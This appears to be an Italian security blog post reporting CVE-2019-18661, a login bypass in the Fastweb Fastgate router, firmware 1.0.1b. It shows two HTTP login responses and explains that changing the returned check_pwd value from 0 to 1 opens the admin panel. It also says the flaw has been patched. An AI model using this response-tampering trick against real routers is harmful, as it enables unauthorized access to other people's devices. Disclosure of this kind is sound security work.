Grave vulnerabilità nel router Fastweb

Un ricercatore di sicurezza ha reso noto una vulnerabilità nel router Fastgate di Fastweb con versione software 1.0.1b. Il CVE è “CVE-2019-18661“.

Grazie a questo bug, è possibile bypassare il login di amministrazione del router ed accedere al suo pannello di controllo.

Il ricercatore  comunica che il tutto è possibile modificando il valore restituito da check_pwd da 0 a 1.

In basso si può cosa accade utilizzando credenziali a caso senza modificare il predetto parametro. In questo maniera viene generato un messaggio d’errore e non avviene l’accesso.

HTTP/1.1 200 OK
Server: nginx
Date: Wed, DD MM 2019 22:18:45 GMT
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
CONTENT-LANGUAGE: en
Content-Security-Policy: default-src 'self';script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline'
Content-Length: 96

{
  "login_confirm":{
    "login_confirm":"end",
    "check_user":"1",
    "check_pwd":"0"
  }
}

Invece con la modifica del parametro check_pwd da 0 a 1, è possibile bypassare il login ed accedere al pannello di controllo.

HTTP/1.1 200 OK
Server: nginx
Date: Wed, DD MM 2019 22:18:45 GMT
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
CONTENT-LANGUAGE: en
Content-Security-Policy: default-src 'self';script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline'
Content-Length: 96

{
  "login_confirm":{
    "login_confirm":"end",
    "check_user":"1",
    "check_pwd":"1"
  }
}

A questo punto è stato notiziato il team di sicurezza di Fastweb che ha prontamente corretto l’anomalia mentre Per l’utente non resta che fare un aggiornamento

Print Friendly, PDF & Email

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.